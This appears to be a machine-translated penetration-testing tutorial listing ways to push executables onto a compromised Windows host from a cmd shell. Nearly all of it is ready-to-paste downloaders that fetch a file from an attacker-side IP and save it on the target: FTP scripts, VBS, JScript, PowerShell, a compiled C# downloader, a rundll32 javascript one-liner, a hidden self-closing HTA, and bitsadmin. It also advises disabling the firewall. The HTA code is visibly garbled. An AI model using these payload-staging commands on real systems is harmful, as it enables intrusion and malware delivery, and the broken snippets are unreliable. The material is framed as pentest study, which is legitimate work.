Analysis of penetration techniques-N methods for uploading files through cmd

Analysis of penetration techniques-N methods for uploading files through cmd

0x00 Preface

During the penetration test, files are often uploaded to the target host. I encountered this problem in the recent study and test process, only the cmd shell is required to upload files to the target host (Windows System), so this article will summarize this technique.

Picture from http://www.telegraph.co.uk/news/worldnews/northamerica/usa/11754089/Hacker-remotely-crashes-Jeep-from-10-miles-away.html

0x02 test environment

OS: Win7 x86test exe: ssss2.exe. Output 1 after running

0x03 General upload Methods 1. debug

Debug is a program debugging tool with the following functions:

Directly enter, change, track, run the assembly language source program, observe the content of the operating system, view the content of the rom bios, observe and change the Setting Value in RAM, read and write the floppy disk data by sector or file

Specifically, it also provides a function to convert hexadecimal code into executable files:

Based on the objectives of this article, the ideas are as follows:

Convert the exe file to hex in hexadecimal format and use the echo command to write the hex code to the file. Use the debug function to restore the hex code to the exe file.

Actual test:

Exe2bat.exe in kaliprovides this function, which is located in/usr/share/windows-binaries

Procedure:

Kali:

#!bashcd /usr/share/windows-binarieswine exe2bat.exe ssss2.exe ssss2.txt

After the command is executed, ssss2.txt is generated, and the content in the ssss2.txt is copied and pasted to the cmd command line.

1.dll2017123.hex、ssss.exe will be generated after execution

Note:
Exe2bat does not support files larger than 64 KB

2. ftp

Set up an ftp server:

Ip: 192.168.174.151 file: ssss2.exe

Execute the following code in sequence to download files through ftp

Cmd:

#!bashecho open 192.168.174.151 21> ftp.txtecho ftp>> ftp.txtecho bin >> ftp.txtecho ftp>> ftp.txtecho GET ssss2.exe >> ftp.txtftp -s:ftp.txt

Note:
When you use ftp for the first time, the firewall will be blocked in a pop-up window. before using it, remember to add firewall rules first.

3. vbs

Vbs downloader, using msxml2.xmlhttp and adodb. stream objects

Save the following code as a. vbs file:

#!vbSet Post = CreateObject("Msxml2.XMLHTTP")Set Shell = CreateObject("Wscript.Shell")Post.Open "GET","http://192.168.174.145/ssss2.exe",0Post.Send()Set aGet = CreateObject("ADODB.Stream")aGet.Mode = 3aGet.Type = 1aGet.Open()aGet.Write(Post.responseBody)aGet.SaveToFile "C:\test\update\ssss2.exe",2

The command corresponding to cmd is:

#!bashecho Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbsecho Set Shell = CreateObject("Wscript.Shell") >>download.vbsecho Post.Open "GET","http://192.168.174.145/ssss2.exe",0 >>download.vbsecho Post.Send() >>download.vbsecho Set aGet = CreateObject("ADODB.Stream") >>download.vbsecho aGet.Mode = 3 >>download.vbsecho aGet.Type = 1 >>download.vbsecho aGet.Open() >>download.vbsecho aGet.Write(Post.responseBody) >>download.vbsecho aGet.SaveToFile "C:\test\update\ssss2.exe",2 >>download.vbs

Download.vbs will be generated after the subsequent execution in sequence, and then download.vbs will be executed to download ssss2.exe.

4. powershell

Cmd:

#!powershellpowershell (new-object System.Net.WebClient).DownloadFile( 'http://192.168.174.145/ssss2.exe','C:\test\update\ssss2.exe')

5. csc

Csc.exe is a C # compiler in Microsoft. NET Framework. It is included in Windows by default. You can compile the cs file into exe under the command line.

C # downloader code:

#!csharpusing System.Net;namespace downloader{    class Program    {        static void Main(string[] args)        {            WebClient client = new WebClient();            string URLAddress = @"http://192.168.174.145/ssss2.exe";            string receivePath = @"C:\test\update\";            client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName        (URLAddress));        }    }}

Use echoto write the code to the download.csfile, and then use csc.exe to compile the cs file.

Run

#!bashC:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:C:\test\update\download.exe C:\test\update\download.cs

Download.exe is successfully generated.

Note:
The absolute path of csc.exe must be determined based on the. net version of the system.

6. JScript

Compared with Scripting. FileSystemObject used in JSRat

Using ADODB. Stream for simplicity and Efficiency

The following code is saved as a js file and can be directly executed to download the file.

#!jsvar Object = WScript.CreateObject("MSXML2.XMLHTTP");Object.open("GET","http://192.168.174.145/ssss2.exe",false);Object.send();if (Object.Status == 200){    var Stream = WScript.CreateObject("ADODB.Stream");    Stream.Open();    Stream.Type = 1;    Stream.Write(Object.ResponseBody);    Stream.SaveToFile("C:\\test\\update\\ssss2.exe", 2);    Stream.Close();}

Merge the statement into rundll32 (similar to the JSRat startup method ):

Cmd:

#!bashrundll32.exe javascript："\..\mshtml,RunHTMLApplication ";document.write();Object=new%20ActiveXObject("Microsoft.XMLHTTP");Object.open("GET","http://192.168.174.145/ssss2.exe",false);Object.send();if(Object.Status==200){Stream=new%20ActiveXObject("ADODB.Stream");Stream.Open();Stream.Type=1;Stream.Write(Object.ResponseBody);Stream.SaveToFile("C:\\test\\update\\ssss2.exe",2);Stream.Close();}

After the execution, the system will prompt that you do not have the permission. It is interesting to note that more details will be introduced in future articles.

7. hta

Add the function of minimizing and automatically exiting the hta program. The hta window is minimized during execution, and the hta program is automatically exited after the file is downloaded.

Run the following code to save the file as a. hta:

#!js

<Script> var Object = new ActiveXObject ("MSXML2.XMLHTTP"); Object. open ("GET", "http: // 192.168.174.145/ssss2.exe", false); Object. send (); if (Object. status = 200) {var Stream = new ActiveXObject ("ADODB. stream "); Stream. open (); Stream. type = 1; Stream. write (Object. responseBody); Stream. saveToFile ("C: \ test \ update \ ssss2.exe", 2); Stream. close ();} window. close (); </script> 8. bitsadmin

Bitsadmin is a command line tool that can be used to create, download, upload, and monitor the download progress. Windows systems after xp

Usage:

Cmd:

#!bashbitsadmin /transfer n http://download.sysinternals.com/files/PSTools.zip  C:\test\update\PSTools.zip 

Download successful

Note:
Https and ftp protocols are not supported
If you use the simplehttpserver of kali as the server, an error is reported.

0x04 supplementary upload Method

The above are the default programs included in the system. Combined with the above methods and using third-party tools, the functions can also be implemented.

The idea here is to download a third-party tool through bitsadmin, and then use a third-party tool to transfer files.

1. wget:

#!bashbitsadmin /transfer n http://www.interlog.com/~tcharron/wgetwin-1_5_3_1-binary.zip  C:\test\update\wget.zip

Wget.zip will be downloaded after running.

Note:
Windows does not include the command to decompress the zip file by default. However, you can use vbs to decompress the zip file.

Decompress vbs:

Save the following code as a. vbs file:

#!vbUnZip "C:\test\update\wget.zip","C:\test\update\wget\"Sub UnZip(ByVal myZipFile, ByVal myTargetDir)    Set fso = CreateObject("Scripting.FileSystemObject")    If NOT fso.FileExists(myZipFile) Then        Exit Sub    ElseIf fso.GetExtensionName(myZipFile) <> "zip" Then        Exit Sub    ElseIf NOT fso.FolderExists(myTargetDir) Then        fso.CreateFolder(myTargetDir)    End If    Set objShell = CreateObject("Shell.Application")    Set objSource = objShell.NameSpace(myZipFile)    Set objFolderItem = objSource.Items()    Set objTarget = objShell.NameSpace(myTargetDir)    intOptions = 256    objTarget.CopyHere objFolderItem, intOptionsEnd Sub

Code from http://demon.tw/programming/vbs-unzip-file.html

After successful decompression, you can transfer files through wget.exe.

#!bashC:\test\update\wget\wget.exe http://192.168.174.145/ssss2.exe

2. ftfp

Similarly, bitsadminis is used to download tftp.exe, and tftp is used to transmit files.

#!bashbitsadmin /transfer n http://www.winagents.com/downloads/tftp.exe C:\test\update\tftp.exe

After the download is successful, use tftp to transfer the file:

#!bashtftp -i 192.168.174.151 GET tftp\ssss2.exe C:\test\update\ssss2.exe

Note:
The default firewall intercepts

Turn off the firewall or add rules.

0x05 Summary

This article sorts out some commonly used techniques for transferring files through cmd, focusing on introducing more common and simple methods, so it does not introduce other implementation methods that require configuring the development environment, for example, Python, Ruby, Php, etc. If you have better implementation methods, please contact me and learn together.